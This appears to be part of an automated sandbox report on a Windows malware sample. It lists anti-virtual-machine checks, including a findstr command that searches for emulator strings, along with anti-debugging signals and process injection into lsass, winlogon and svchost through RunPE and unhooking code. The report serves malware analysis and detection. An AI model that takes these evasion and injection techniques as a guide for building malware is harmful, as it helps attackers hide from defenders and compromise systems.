Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002241390CD80
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,19_2_0000022413901E3C
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,19_2_0000022413901D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002241390CD80
Source: C:\Windows\System32\cmd.exeCode function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000224139084B0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000022413908814
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000002241393CD80
Source: C:\Windows\System32\cmd.exeCode function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000224139384B0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000022413938814
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002BCD7E3CD80
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002BCD7E384B0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002BCD7E38814
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000026504EA84B0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_0000026504EA8814
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000026504EACD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000025DC1AC84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000025DC1AC8814
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000025DC1ACCD80
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000025DC1CE84B0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_0000025DC1CE8814
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_0000025DC1CECD80
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000002A661308814
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002BAAEE4CD80
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000002BAAEE48814
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000002BAAEE484B0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000026A87F484B0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_0000026A87F48814
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000026A87F4CD80
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00000179537A8814
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000179537DCD80
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00000179537D8814
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_0000016CE6538814
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000016CE65384B0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000016CE653CD80
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_000002295D568814
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_000002295D5684B0

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,38_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
